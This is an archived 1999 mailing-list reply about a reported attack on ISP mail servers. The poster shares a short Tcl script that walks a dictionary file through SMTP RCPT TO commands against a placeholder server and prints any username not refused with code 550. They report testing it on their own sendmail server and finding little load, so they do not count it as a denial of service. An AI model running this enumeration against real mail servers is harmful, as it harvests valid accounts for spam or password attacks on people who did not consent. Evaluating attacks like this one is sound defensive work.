On Mon, 8 Mar 1999, Brett Glass wrote: > Several ISPs throughout the Net are reporting an attack described at > > http://www.l8r.com/nwa/nwa1.htm Using /usr/dict/words on my linux box and the TCL code below I ran this attack against a sendmail (8.9.2) mailserver which uses virtual user tables and a lengthy aliases database. The result was the load went up slightly and log entries consumed some disk space. All in All, Minimal threat to service. I would not call this a DOS attack in our configuration. #!/usr/bin/tclsh set infile [open /usr/dict/words r] set sock [socket someserver.example.com 25] puts $sock "HELO remotehost.example.com" puts $sock "MAIL FROM: userat_private" while {[eof $infile] != 1} { gets $infile input puts $sock "RCPT TO: $input" flush $sock gets $sock output if {[string range $output 0 2] != "550"} { puts "Valid Username! $input" } } close $sock exit DG.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:38:29 PDT